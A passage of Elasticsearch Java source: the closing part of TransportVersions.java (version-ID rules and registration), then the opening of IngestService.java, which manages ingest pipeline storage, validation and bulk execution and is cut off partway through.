* M - The major version of Elasticsearch
* NNN - The server version part
* SS - The serverless version part. It should always be 00 here, it is used by serverless only.
* P - The patch version part
*
* To determine the id of the next TransportVersion constant, do the following:
* - Use the same major version, unless bumping majors
* - Bump the server version part by 1, unless creating a patch version
* - Leave the serverless part as 00
* - Bump the patch part if creating a patch version
*
* If a patch version is created, it should be placed sorted among the other existing constants.
*
* REVERTING A TRANSPORT VERSION
*
* If you revert a commit with a transport version change, you MUST ensure there is a NEW transport version representing the reverted
* change. DO NOT let the transport version go backwards, it must ALWAYS be incremented.
*
* DETERMINING TRANSPORT VERSIONS FROM GIT HISTORY
*
* If your git checkout has the expected minor-version-numbered branches and the expected release-version tags then you can find the
* transport versions known by a particular release ...
*
* git show v8.11.0:server/src/main/java/org/elasticsearch/TransportVersions.java | grep '= def'
*
* ... or by a particular branch ...
*
* git show 8.11:server/src/main/java/org/elasticsearch/TransportVersions.java | grep '= def'
*
* ... and you can see which versions were added in between two versions too ...
*
* git diff v8.11.0..main -- server/src/main/java/org/elasticsearch/TransportVersions.java
*
* In branches 8.7-8.10 see server/src/main/java/org/elasticsearch/TransportVersion.java for the equivalent definitions.
*/
/**
* Reference to the earliest compatible transport version to this version of the codebase.
* This should be the transport version used by the highest minor version of the previous major.
*/
public static final TransportVersion MINIMUM_COMPATIBLE = V_7_17_0;
/**
* Reference to the minimum transport version that can be used with CCS.
* This should be the transport version used by the previous minor release.
*/
public static final TransportVersion MINIMUM_CCS_VERSION = V_8_13_0;
static final NavigableMap<Integer, TransportVersion> VERSION_IDS = getAllVersionIds(TransportVersions.class);
// the highest transport version constant defined in this file, used as a fallback for TransportVersion.current()
static final TransportVersion LATEST_DEFINED;
static {
LATEST_DEFINED = VERSION_IDS.lastEntry().getValue();
// see comment on IDS field
// now we're registered all the transport versions, we can clear the map
IDS = null;
}
public static NavigableMap<Integer, TransportVersion> getAllVersionIds(Class<?> cls) {
Map<Integer, String> versionIdFields = new HashMap<>();
NavigableMap<Integer, TransportVersion> builder = new TreeMap<>();
Set<String> ignore = Set.of("ZERO", "CURRENT", "MINIMUM_COMPATIBLE", "MINIMUM_CCS_VERSION");
for (Field declaredField : cls.getFields()) {
if (declaredField.getType().equals(TransportVersion.class)) {
String fieldName = declaredField.getName();
if (ignore.contains(fieldName)) {
continue;
}
TransportVersion version;
try {
version = (TransportVersion) declaredField.get(null);
} catch (IllegalAccessException e) {
throw new AssertionError(e);
}
builder.put(version.id(), version);
if (Assertions.ENABLED) {
// check the version number is unique
var sameVersionNumber = versionIdFields.put(version.id(), fieldName);
assert sameVersionNumber == null
: "Versions ["
+ sameVersionNumber
+ "] and ["
+ fieldName
+ "] have the same version number ["
+ version.id()
+ "]. Each TransportVersion should have a different version number";
}
}
}
return Collections.unmodifiableNavigableMap(builder);
}
static Collection<TransportVersion> getAllVersions() {
return VERSION_IDS.values();
}
static final IntFunction<String> VERSION_LOOKUP = ReleaseVersions.generateVersionsLookup(TransportVersions.class);
// no instance
private TransportVersions() {}
}
| mhl-b/elasticsearch | server/src/main/java/org/elasticsearch/TransportVersions.java |
1,024 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.ingest;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.util.Strings;
import org.elasticsearch.ElasticsearchParseException;
import org.elasticsearch.ExceptionsHelper;
import org.elasticsearch.ResourceNotFoundException;
import org.elasticsearch.action.ActionListener;
import org.elasticsearch.action.DocWriteRequest;
import org.elasticsearch.action.admin.cluster.node.info.NodeInfo;
import org.elasticsearch.action.admin.cluster.node.info.NodesInfoResponse;
import org.elasticsearch.action.bulk.TransportBulkAction;
import org.elasticsearch.action.index.IndexRequest;
import org.elasticsearch.action.ingest.DeletePipelineRequest;
import org.elasticsearch.action.ingest.PutPipelineRequest;
import org.elasticsearch.action.support.RefCountingRunnable;
import org.elasticsearch.action.support.master.AcknowledgedResponse;
import org.elasticsearch.client.internal.Client;
import org.elasticsearch.cluster.ClusterChangedEvent;
import org.elasticsearch.cluster.ClusterState;
import org.elasticsearch.cluster.ClusterStateApplier;
import org.elasticsearch.cluster.ClusterStateTaskExecutor;
import org.elasticsearch.cluster.ClusterStateTaskListener;
import org.elasticsearch.cluster.metadata.DataStream;
import org.elasticsearch.cluster.metadata.IndexAbstraction;
import org.elasticsearch.cluster.metadata.IndexMetadata;
import org.elasticsearch.cluster.metadata.IndexNameExpressionResolver;
import org.elasticsearch.cluster.metadata.IndexTemplateMetadata;
import org.elasticsearch.cluster.metadata.Metadata;
import org.elasticsearch.cluster.metadata.MetadataIndexTemplateService;
import org.elasticsearch.cluster.node.DiscoveryNode;
import org.elasticsearch.cluster.service.ClusterService;
import org.elasticsearch.cluster.service.MasterServiceTaskQueue;
import org.elasticsearch.common.Priority;
import org.elasticsearch.common.TriConsumer;
import org.elasticsearch.common.bytes.BytesReference;
import org.elasticsearch.common.regex.Regex;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.util.CollectionUtils;
import org.elasticsearch.common.util.concurrent.AbstractRunnable;
import org.elasticsearch.common.xcontent.XContentHelper;
import org.elasticsearch.core.Nullable;
import org.elasticsearch.core.Releasable;
import org.elasticsearch.core.TimeValue;
import org.elasticsearch.core.Tuple;
import org.elasticsearch.env.Environment;
import org.elasticsearch.gateway.GatewayService;
import org.elasticsearch.grok.MatcherWatchdog;
import org.elasticsearch.index.IndexSettings;
import org.elasticsearch.index.VersionType;
import org.elasticsearch.index.analysis.AnalysisRegistry;
import org.elasticsearch.node.ReportingService;
import org.elasticsearch.plugins.IngestPlugin;
import org.elasticsearch.plugins.internal.DocumentParsingProvider;
import org.elasticsearch.plugins.internal.DocumentSizeObserver;
import org.elasticsearch.script.ScriptService;
import org.elasticsearch.threadpool.Scheduler;
import org.elasticsearch.threadpool.ThreadPool;
import org.elasticsearch.xcontent.XContentBuilder;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.Objects;
import java.util.Optional;
import java.util.Set;
import java.util.TreeMap;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.concurrent.Executor;
import java.util.function.BiConsumer;
import java.util.function.BiFunction;
import java.util.function.Consumer;
import java.util.function.IntConsumer;
import java.util.function.Predicate;
import java.util.stream.Collectors;
import static org.elasticsearch.core.Strings.format;
/**
* Holder class for several ingest related services.
*/
public class IngestService implements ClusterStateApplier, ReportingService<IngestInfo> {
public static final String NOOP_PIPELINE_NAME = "_none";
public static final String INGEST_ORIGIN = "ingest";
private static final Logger logger = LogManager.getLogger(IngestService.class);
private final MasterServiceTaskQueue<PipelineClusterStateUpdateTask> taskQueue;
private final ClusterService clusterService;
private final ScriptService scriptService;
private final DocumentParsingProvider documentParsingProvider;
private final Map<String, Processor.Factory> processorFactories;
// Ideally this should be in IngestMetadata class, but we don't have the processor factories around there.
// We know of all the processor factories when a node with all its plugin have been initialized. Also some
// processor factories rely on other node services. Custom metadata is statically registered when classes
// are loaded, so in the cluster state we just save the pipeline config and here we keep the actual pipelines around.
private volatile Map<String, PipelineHolder> pipelines = Map.of();
private final ThreadPool threadPool;
private final IngestMetric totalMetrics = new IngestMetric();
private final List<Consumer<ClusterState>> ingestClusterStateListeners = new CopyOnWriteArrayList<>();
private volatile ClusterState state;
private static BiFunction<Long, Runnable, Scheduler.ScheduledCancellable> createScheduler(ThreadPool threadPool) {
return (delay, command) -> threadPool.schedule(command, TimeValue.timeValueMillis(delay), threadPool.generic());
}
public static MatcherWatchdog createGrokThreadWatchdog(Environment env, ThreadPool threadPool) {
final Settings settings = env.settings();
final BiFunction<Long, Runnable, Scheduler.ScheduledCancellable> scheduler = createScheduler(threadPool);
long intervalMillis = IngestSettings.GROK_WATCHDOG_INTERVAL.get(settings).getMillis();
long maxExecutionTimeMillis = IngestSettings.GROK_WATCHDOG_INTERVAL.get(settings).getMillis();
return MatcherWatchdog.newInstance(intervalMillis, maxExecutionTimeMillis, threadPool::relativeTimeInMillis, scheduler::apply);
}
/**
* Cluster state task executor for ingest pipeline operations
*/
static final ClusterStateTaskExecutor<PipelineClusterStateUpdateTask> PIPELINE_TASK_EXECUTOR = batchExecutionContext -> {
final var allIndexMetadata = batchExecutionContext.initialState().metadata().indices().values();
final IngestMetadata initialIngestMetadata = batchExecutionContext.initialState().metadata().custom(IngestMetadata.TYPE);
var currentIngestMetadata = initialIngestMetadata;
for (final var taskContext : batchExecutionContext.taskContexts()) {
try {
final var task = taskContext.getTask();
try (var ignored = taskContext.captureResponseHeaders()) {
currentIngestMetadata = task.execute(currentIngestMetadata, allIndexMetadata);
}
taskContext.success(() -> task.listener.onResponse(AcknowledgedResponse.TRUE));
} catch (Exception e) {
taskContext.onFailure(e);
}
}
final var finalIngestMetadata = currentIngestMetadata;
return finalIngestMetadata == initialIngestMetadata
? batchExecutionContext.initialState()
: batchExecutionContext.initialState().copyAndUpdateMetadata(b -> b.putCustom(IngestMetadata.TYPE, finalIngestMetadata));
};
/**
* Specialized cluster state update task specifically for ingest pipeline operations.
* These operations all receive an AcknowledgedResponse.
*/
public abstract static class PipelineClusterStateUpdateTask implements ClusterStateTaskListener {
final ActionListener<AcknowledgedResponse> listener;
PipelineClusterStateUpdateTask(ActionListener<AcknowledgedResponse> listener) {
this.listener = listener;
}
public abstract IngestMetadata execute(IngestMetadata currentIngestMetadata, Collection<IndexMetadata> allIndexMetadata);
@Override
public void onFailure(Exception e) {
listener.onFailure(e);
}
}
@SuppressWarnings("this-escape")
public IngestService(
ClusterService clusterService,
ThreadPool threadPool,
Environment env,
ScriptService scriptService,
AnalysisRegistry analysisRegistry,
List<IngestPlugin> ingestPlugins,
Client client,
MatcherWatchdog matcherWatchdog,
DocumentParsingProvider documentParsingProvider
) {
this.clusterService = clusterService;
this.scriptService = scriptService;
this.documentParsingProvider = documentParsingProvider;
this.processorFactories = processorFactories(
ingestPlugins,
new Processor.Parameters(
env,
scriptService,
analysisRegistry,
threadPool.getThreadContext(),
threadPool::relativeTimeInMillis,
createScheduler(threadPool),
this,
client,
threadPool.generic()::execute,
matcherWatchdog
)
);
this.threadPool = threadPool;
this.taskQueue = clusterService.createTaskQueue("ingest-pipelines", Priority.NORMAL, PIPELINE_TASK_EXECUTOR);
}
/**
* This copy constructor returns a copy of the given ingestService, using all of the same internal state. The returned copy is not
* registered to listen to any cluster state changes
* @param ingestService
*/
IngestService(IngestService ingestService) {
this.clusterService = ingestService.clusterService;
this.scriptService = ingestService.scriptService;
this.documentParsingProvider = ingestService.documentParsingProvider;
this.processorFactories = ingestService.processorFactories;
this.threadPool = ingestService.threadPool;
this.taskQueue = ingestService.taskQueue;
this.pipelines = ingestService.pipelines;
this.state = ingestService.state;
}
private static Map<String, Processor.Factory> processorFactories(List<IngestPlugin> ingestPlugins, Processor.Parameters parameters) {
Map<String, Processor.Factory> processorFactories = new TreeMap<>();
for (IngestPlugin ingestPlugin : ingestPlugins) {
Map<String, Processor.Factory> newProcessors = ingestPlugin.getProcessors(parameters);
for (Map.Entry<String, Processor.Factory> entry : newProcessors.entrySet()) {
if (processorFactories.put(entry.getKey(), entry.getValue()) != null) {
throw new IllegalArgumentException("Ingest processor [" + entry.getKey() + "] is already registered");
}
}
}
logger.debug("registered ingest processor types: {}", processorFactories.keySet());
return Map.copyOf(processorFactories);
}
/**
* Resolves the potential pipelines (default and final) from the requests or templates associated to the index and then **mutates**
* the {@link org.elasticsearch.action.index.IndexRequest} passed object with the pipeline information.
* <p>
* Also, this method marks the request as `isPipelinesResolved = true`: Due to the request could be rerouted from a coordinating node
* to an ingest node, we have to be able to avoid double resolving the pipelines and also able to distinguish that either the pipeline
* comes as part of the request or resolved from this method. All this is made to later be able to reject the request in case the
* pipeline was set by a required pipeline **and** the request also has a pipeline request too.
*
* @param originalRequest Original write request received.
* @param indexRequest The {@link org.elasticsearch.action.index.IndexRequest} object to update.
* @param metadata Cluster metadata from where the pipeline information could be derived.
*/
public static void resolvePipelinesAndUpdateIndexRequest(
final DocWriteRequest<?> originalRequest,
final IndexRequest indexRequest,
final Metadata metadata
) {
resolvePipelinesAndUpdateIndexRequest(originalRequest, indexRequest, metadata, System.currentTimeMillis());
}
static void resolvePipelinesAndUpdateIndexRequest(
final DocWriteRequest<?> originalRequest,
final IndexRequest indexRequest,
final Metadata metadata,
final long epochMillis
) {
if (indexRequest.isPipelineResolved()) {
return;
}
String requestPipeline = indexRequest.getPipeline();
Pipelines pipelines = resolvePipelinesFromMetadata(originalRequest, indexRequest, metadata, epochMillis) //
.or(() -> resolvePipelinesFromIndexTemplates(indexRequest, metadata))
.orElse(Pipelines.NO_PIPELINES_DEFINED);
// The pipeline coming as part of the request always has priority over the resolved one from metadata or templates
if (requestPipeline != null) {
indexRequest.setPipeline(requestPipeline);
} else {
indexRequest.setPipeline(pipelines.defaultPipeline);
}
indexRequest.setFinalPipeline(pipelines.finalPipeline);
indexRequest.isPipelineResolved(true);
}
public ClusterService getClusterService() {
return clusterService;
}
public ScriptService getScriptService() {
return scriptService;
}
/**
* Deletes the pipeline specified by id in the request.
*/
public void delete(DeletePipelineRequest request, ActionListener<AcknowledgedResponse> listener) {
taskQueue.submitTask(
"delete-pipeline-" + request.getId(),
new DeletePipelineClusterStateUpdateTask(listener, request),
request.masterNodeTimeout()
);
}
/**
* Used by this class and {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public static class DeletePipelineClusterStateUpdateTask extends PipelineClusterStateUpdateTask {
private final DeletePipelineRequest request;
DeletePipelineClusterStateUpdateTask(ActionListener<AcknowledgedResponse> listener, DeletePipelineRequest request) {
super(listener);
this.request = request;
}
/**
* Used by the {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public DeletePipelineClusterStateUpdateTask(String id) {
this(null, new DeletePipelineRequest(id));
}
@Override
public IngestMetadata execute(IngestMetadata currentIngestMetadata, Collection<IndexMetadata> allIndexMetadata) {
if (currentIngestMetadata == null) {
return null;
}
Map<String, PipelineConfiguration> pipelines = currentIngestMetadata.getPipelines();
Set<String> toRemove = new HashSet<>();
for (String pipelineKey : pipelines.keySet()) {
if (Regex.simpleMatch(request.getId(), pipelineKey)) {
toRemove.add(pipelineKey);
}
}
if (toRemove.isEmpty() && Regex.isMatchAllPattern(request.getId()) == false) {
throw new ResourceNotFoundException("pipeline [{}] is missing", request.getId());
} else if (toRemove.isEmpty()) {
return currentIngestMetadata;
}
final Map<String, PipelineConfiguration> pipelinesCopy = new HashMap<>(pipelines);
for (String key : toRemove) {
validateNotInUse(key, allIndexMetadata);
pipelinesCopy.remove(key);
}
return new IngestMetadata(pipelinesCopy);
}
}
static void validateNotInUse(String pipeline, Collection<IndexMetadata> allIndexMetadata) {
List<String> defaultPipelineIndices = new ArrayList<>();
List<String> finalPipelineIndices = new ArrayList<>();
for (IndexMetadata indexMetadata : allIndexMetadata) {
String defaultPipeline = IndexSettings.DEFAULT_PIPELINE.get(indexMetadata.getSettings());
String finalPipeline = IndexSettings.FINAL_PIPELINE.get(indexMetadata.getSettings());
if (pipeline.equals(defaultPipeline)) {
defaultPipelineIndices.add(indexMetadata.getIndex().getName());
}
if (pipeline.equals(finalPipeline)) {
finalPipelineIndices.add(indexMetadata.getIndex().getName());
}
}
if (defaultPipelineIndices.size() > 0 || finalPipelineIndices.size() > 0) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"pipeline [%s] cannot be deleted because it is %s%s%s",
pipeline,
defaultPipelineIndices.size() > 0
? String.format(
Locale.ROOT,
"the default pipeline for %s index(es) including [%s]",
defaultPipelineIndices.size(),
defaultPipelineIndices.stream().sorted().limit(3).collect(Collectors.joining(","))
)
: Strings.EMPTY,
defaultPipelineIndices.size() > 0 && finalPipelineIndices.size() > 0 ? " and " : Strings.EMPTY,
finalPipelineIndices.size() > 0
? String.format(
Locale.ROOT,
"the final pipeline for %s index(es) including [%s]",
finalPipelineIndices.size(),
finalPipelineIndices.stream().sorted().limit(3).collect(Collectors.joining(","))
)
: Strings.EMPTY
)
);
}
}
/**
* @return pipeline configuration specified by id. If multiple ids or wildcards are specified multiple pipelines
* may be returned
*/
// Returning PipelineConfiguration instead of Pipeline, because Pipeline and Processor interface don't
// know how to serialize themselves.
public static List<PipelineConfiguration> getPipelines(ClusterState clusterState, String... ids) {
IngestMetadata ingestMetadata = clusterState.getMetadata().custom(IngestMetadata.TYPE);
return innerGetPipelines(ingestMetadata, ids);
}
static List<PipelineConfiguration> innerGetPipelines(IngestMetadata ingestMetadata, String... ids) {
if (ingestMetadata == null) {
return List.of();
}
// if we didn't ask for _any_ ID, then we get them all (this is the same as if they ask for '*')
if (ids.length == 0) {
return new ArrayList<>(ingestMetadata.getPipelines().values());
}
List<PipelineConfiguration> result = new ArrayList<>(ids.length);
for (String id : ids) {
if (Regex.isSimpleMatchPattern(id)) {
for (Map.Entry<String, PipelineConfiguration> entry : ingestMetadata.getPipelines().entrySet()) {
if (Regex.simpleMatch(id, entry.getKey())) {
result.add(entry.getValue());
}
}
} else {
PipelineConfiguration pipeline = ingestMetadata.getPipelines().get(id);
if (pipeline != null) {
result.add(pipeline);
}
}
}
return result;
}
/**
* Stores the specified pipeline definition in the request.
*/
public void putPipeline(
PutPipelineRequest request,
ActionListener<AcknowledgedResponse> listener,
Consumer<ActionListener<NodesInfoResponse>> nodeInfoListener
) throws Exception {
if (isNoOpPipelineUpdate(state, request)) {
// existing pipeline matches request pipeline -- no need to update
listener.onResponse(AcknowledgedResponse.TRUE);
return;
}
nodeInfoListener.accept(listener.delegateFailureAndWrap((l, nodeInfos) -> {
validatePipelineRequest(request, nodeInfos);
taskQueue.submitTask(
"put-pipeline-" + request.getId(),
new PutPipelineClusterStateUpdateTask(l, request),
request.masterNodeTimeout()
);
}));
}
public void validatePipelineRequest(PutPipelineRequest request, NodesInfoResponse nodeInfos) throws Exception {
final Map<String, Object> config = XContentHelper.convertToMap(request.getSource(), false, request.getXContentType()).v2();
Map<DiscoveryNode, IngestInfo> ingestInfos = new HashMap<>();
for (NodeInfo nodeInfo : nodeInfos.getNodes()) {
ingestInfos.put(nodeInfo.getNode(), nodeInfo.getInfo(IngestInfo.class));
}
validatePipeline(ingestInfos, request.getId(), config);
}
public static boolean isNoOpPipelineUpdate(ClusterState state, PutPipelineRequest request) {
IngestMetadata currentIngestMetadata = state.metadata().custom(IngestMetadata.TYPE);
if (request.getVersion() == null
&& currentIngestMetadata != null
&& currentIngestMetadata.getPipelines().containsKey(request.getId())) {
var pipelineConfig = XContentHelper.convertToMap(request.getSource(), false, request.getXContentType()).v2();
var currentPipeline = currentIngestMetadata.getPipelines().get(request.getId());
if (currentPipeline.getConfigAsMap().equals(pipelineConfig)) {
return true;
}
}
return false;
}
/**
* Returns the pipeline by the specified id
*/
public Pipeline getPipeline(String id) {
if (id == null) {
return null;
}
PipelineHolder holder = pipelines.get(id);
if (holder != null) {
return holder.pipeline;
} else {
return null;
}
}
public Map<String, Processor.Factory> getProcessorFactories() {
return processorFactories;
}
@Override
public IngestInfo info() {
Map<String, Processor.Factory> processorFactories = getProcessorFactories();
List<ProcessorInfo> processorInfoList = new ArrayList<>(processorFactories.size());
for (Map.Entry<String, Processor.Factory> entry : processorFactories.entrySet()) {
processorInfoList.add(new ProcessorInfo(entry.getKey()));
}
return new IngestInfo(processorInfoList);
}
Map<String, PipelineHolder> pipelines() {
return pipelines;
}
/**
* Recursive method to obtain all the non-failure processors for given compoundProcessor.
* <p>
* 'if' and 'ignore_failure'/'on_failure' are implemented as wrappers around the actual processor (via {@link ConditionalProcessor}
* and {@link OnFailureProcessor}, respectively), so we unwrap these processors internally in order to expose the underlying
* 'actual' processor via the metrics. This corresponds best to the customer intent -- e.g. they used a 'set' processor that has an
* 'on_failure', so we report metrics for the set processor, not an on_failure processor.
*
* @param compoundProcessor The compound processor to start walking the non-failure processors
* @param processorMetrics The list to populate with {@link Processor} {@link IngestMetric} tuples.
*/
private static void collectProcessorMetrics(
CompoundProcessor compoundProcessor,
List<Tuple<Processor, IngestMetric>> processorMetrics
) {
// only surface the top level non-failure processors, on-failure processor times will be included in the top level non-failure
for (Tuple<Processor, IngestMetric> processorWithMetric : compoundProcessor.getProcessorsWithMetrics()) {
Processor processor = processorWithMetric.v1();
IngestMetric metric = processorWithMetric.v2();
// unwrap 'if' and 'ignore_failure/on_failure' wrapping, so that we expose the underlying actual processor
boolean unwrapped;
do {
unwrapped = false;
if (processor instanceof ConditionalProcessor conditional) {
processor = conditional.getInnerProcessor();
metric = conditional.getMetric(); // prefer the conditional's metric, it only covers when the conditional was true
unwrapped = true;
}
if (processor instanceof OnFailureProcessor onFailure) {
processor = onFailure.getInnerProcessor();
metric = onFailure.getInnerMetric(); // the wrapped processor records the failure count
unwrapped = true;
}
} while (unwrapped);
if (processor instanceof CompoundProcessor cp) {
collectProcessorMetrics(cp, processorMetrics);
} else {
processorMetrics.add(new Tuple<>(processor, metric));
}
}
}
/**
* Used in this class and externally by the {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public static class PutPipelineClusterStateUpdateTask extends PipelineClusterStateUpdateTask {
private final PutPipelineRequest request;
PutPipelineClusterStateUpdateTask(ActionListener<AcknowledgedResponse> listener, PutPipelineRequest request) {
super(listener);
this.request = request;
}
/**
* Used by {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public PutPipelineClusterStateUpdateTask(PutPipelineRequest request) {
this(null, request);
}
@Override
public IngestMetadata execute(IngestMetadata currentIngestMetadata, Collection<IndexMetadata> allIndexMetadata) {
BytesReference pipelineSource = request.getSource();
if (request.getVersion() != null) {
var currentPipeline = currentIngestMetadata != null ? currentIngestMetadata.getPipelines().get(request.getId()) : null;
if (currentPipeline == null) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"version conflict, required version [%s] for pipeline [%s] but no pipeline was found",
request.getVersion(),
request.getId()
)
);
}
final Integer currentVersion = currentPipeline.getVersion();
if (Objects.equals(request.getVersion(), currentVersion) == false) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"version conflict, required version [%s] for pipeline [%s] but current version is [%s]",
request.getVersion(),
request.getId(),
currentVersion
)
);
}
var pipelineConfig = XContentHelper.convertToMap(request.getSource(), false, request.getXContentType()).v2();
final Integer specifiedVersion = (Integer) pipelineConfig.get("version");
if (pipelineConfig.containsKey("version") && Objects.equals(specifiedVersion, currentVersion)) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"cannot update pipeline [%s] with the same version [%s]",
request.getId(),
request.getVersion()
)
);
}
// if no version specified in the pipeline definition, inject a version of [request.getVersion() + 1]
if (specifiedVersion == null) {
pipelineConfig.put("version", request.getVersion() == null ? 1 : request.getVersion() + 1);
try {
var builder = XContentBuilder.builder(request.getXContentType().xContent()).map(pipelineConfig);
pipelineSource = BytesReference.bytes(builder);
} catch (IOException e) {
throw new IllegalStateException(e);
}
}
}
Map<String, PipelineConfiguration> pipelines;
if (currentIngestMetadata != null) {
pipelines = new HashMap<>(currentIngestMetadata.getPipelines());
} else {
pipelines = new HashMap<>();
}
pipelines.put(request.getId(), new PipelineConfiguration(request.getId(), pipelineSource, request.getXContentType()));
return new IngestMetadata(pipelines);
}
}
void validatePipeline(Map<DiscoveryNode, IngestInfo> ingestInfos, String pipelineId, Map<String, Object> pipelineConfig)
throws Exception {
if (ingestInfos.isEmpty()) {
throw new IllegalStateException("Ingest info is empty");
}
Pipeline pipeline = Pipeline.create(pipelineId, pipelineConfig, processorFactories, scriptService);
List<Exception> exceptions = new ArrayList<>();
for (Processor processor : pipeline.flattenAllProcessors()) {
// run post-construction extra validation (if any, the default implementation from the Processor interface is a no-op)
try {
processor.extraValidation();
} catch (Exception e) {
exceptions.add(e);
}
for (Map.Entry<DiscoveryNode, IngestInfo> entry : ingestInfos.entrySet()) {
String type = processor.getType();
if (entry.getValue().containsProcessor(type) == false && ConditionalProcessor.TYPE.equals(type) == false) {
String message = "Processor type [" + processor.getType() + "] is not installed on node [" + entry.getKey() + "]";
exceptions.add(ConfigurationUtils.newConfigurationException(processor.getType(), processor.getTag(), null, message));
}
}
}
ExceptionsHelper.rethrowAndSuppress(exceptions);
}
private record IngestPipelinesExecutionResult(boolean success, boolean shouldKeep, Exception exception, String failedIndex) {
private static final IngestPipelinesExecutionResult SUCCESSFUL_RESULT = new IngestPipelinesExecutionResult(true, true, null, null);
private static final IngestPipelinesExecutionResult DISCARD_RESULT = new IngestPipelinesExecutionResult(true, false, null, null);
private static IngestPipelinesExecutionResult failAndStoreFor(String index, Exception e) {
return new IngestPipelinesExecutionResult(false, true, e, index);
}
}
/**
* Executes all applicable pipelines for a collection of documents.
* @param numberOfActionRequests The total number of requests to process.
* @param actionRequests The collection of requests to be processed.
* @param onDropped A callback executed when a document is dropped by a pipeline.
* Accepts the slot in the collection of requests that the document occupies.
* @param shouldStoreFailure A predicate executed on each ingest failure to determine if the
* failure should be stored somewhere.
* @param onStoreFailure A callback executed when a document fails ingest but the failure should
* be persisted elsewhere. Accepts the slot in the collection of requests
* that the document occupies, the index name that the request was targeting
* at the time of failure, and the exception that the document encountered.
* @param onFailure A callback executed when a document fails ingestion and does not need to be
* persisted. Accepts the slot in the collection of requests that the document
* occupies, and the exception that the document encountered.
* @param onCompletion A callback executed once all documents have been processed. Accepts the thread
* that ingestion completed on or an exception in the event that the entire operation
* has failed.
* @param executor Which executor the bulk request should be executed on.
*/
public void executeBulkRequest(
final int numberOfActionRequests,
final Iterable<DocWriteRequest<?>> actionRequests,
final IntConsumer onDropped,
final Predicate<String> shouldStoreFailure,
final TriConsumer<Integer, String, Exception> onStoreFailure,
final BiConsumer<Integer, Exception> onFailure,
final BiConsumer<Thread, Exception> onCompletion,
final Executor executor
) {
assert numberOfActionRequests > 0 : "numberOfActionRequests must be greater than 0 but was [" + numberOfActionRequests + "]";
executor.execute(new AbstractRunnable() {
@Override
public void onFailure(Exception e) {
onCompletion.accept(null, e);
}
@Override
protected void doRun() {
final Thread originalThread = Thread.currentThread();
try (var refs = new RefCountingRunnable(() -> onCompletion.accept(originalThread, null))) {
int i = 0;
for (DocWriteRequest<?> actionRequest : actionRequests) {
IndexRequest indexRequest = TransportBulkAction.getIndexWriteRequest(actionRequest);
if (indexRequest == null) {
i++;
continue;
}
PipelineIterator pipelines = getAndResetPipelines(indexRequest);
if (pipelines.hasNext() == false) {
i++;
continue;
}
// start the stopwatch and acquire a ref to indicate that we're working on this document
final long startTimeInNanos = System.nanoTime();
totalMetrics.preIngest();
final int slot = i;
final Releasable ref = refs.acquire();
final DocumentSizeObserver documentSizeObserver = documentParsingProvider.newDocumentSizeObserver();
final IngestDocument ingestDocument = newIngestDocument(indexRequest, documentSizeObserver);
final org.elasticsearch.script.Metadata originalDocumentMetadata = ingestDocument.getMetadata().clone();
// the document listener gives us three-way logic: a document can fail processing (1), or it can
// be successfully processed. a successfully processed document can be kept (2) or dropped (3).
final ActionListener<IngestPipelinesExecutionResult> documentListener = ActionListener.runAfter(
new ActionListener<>() {
@Override
public void onResponse(IngestPipelinesExecutionResult result) {
assert result != null;
if (result.success) {
if (result.shouldKeep == false) {
onDropped.accept(slot);
}
} else {
// We were given a failure result in the onResponse method, so we must store the failure
// Recover the original document state, track a failed ingest, and pass it along
updateIndexRequestMetadata(indexRequest, originalDocumentMetadata);
totalMetrics.ingestFailed();
onStoreFailure.apply(slot, result.failedIndex, result.exception);
}
}
@Override
public void onFailure(Exception e) {
totalMetrics.ingestFailed();
onFailure.accept(slot, e);
}
},
() -> {
// regardless of success or failure, we always stop the ingest "stopwatch" and release the ref to indicate
// that we're finished with this document
final long ingestTimeInNanos = System.nanoTime() - startTimeInNanos;
totalMetrics.postIngest(ingestTimeInNanos);
ref.close();
}
);
executePipelines(pipelines, indexRequest, ingestDocument, shouldStoreFailure, documentListener);
indexRequest.setNormalisedBytesParsed(documentSizeObserver.normalisedBytesParsed());
assert actionRequest.index() != null;
i++;
}
}
}
});
}
/**
* Returns the pipelines of the request, and updates the request so that it no longer references
* any pipelines (both the default and final pipeline are set to the noop pipeline).
*/
private PipelineIterator getAndResetPipelines(IndexRequest indexRequest) {
final String pipelineId = indexRequest.getPipeline();
indexRequest.setPipeline(NOOP_PIPELINE_NAME);
final String finalPipelineId = indexRequest.getFinalPipeline();
indexRequest.setFinalPipeline(NOOP_PIPELINE_NAME);
return new PipelineIterator(pipelineId, finalPipelineId);
}
/**
* A triple for tracking the non-null id of a pipeline, the pipeline itself, and whether the pipeline is a final pipeline.
*
* @param id the non-null id of the pipeline
* @param pipeline a possibly-null reference to the pipeline for the given pipeline id
* @param isFinal true if the pipeline is a final pipeline
*/
private record PipelineSlot(String id, @Nullable Pipeline pipeline, boolean isFinal) {
public PipelineSlot {
Objects.requireNonNull(id);
}
}
private class PipelineIterator implements Iterator<PipelineSlot> {
private final String defaultPipeline;
private final String finalPipeline;
private final Iterator<PipelineSlot> pipelineSlotIterator;
private PipelineIterator(String defaultPipeline, String finalPipeline) {
this.defaultPipeline = NOOP_PIPELINE_NAME.equals(defaultPipeline) ? null : defaultPipeline;
this.finalPipeline = NOOP_PIPELINE_NAME.equals(finalPipeline) ? null : finalPipeline;
this.pipelineSlotIterator = iterator();
}
public PipelineIterator withoutDefaultPipeline() {
return new PipelineIterator(null, finalPipeline);
}
private Iterator<PipelineSlot> iterator() {
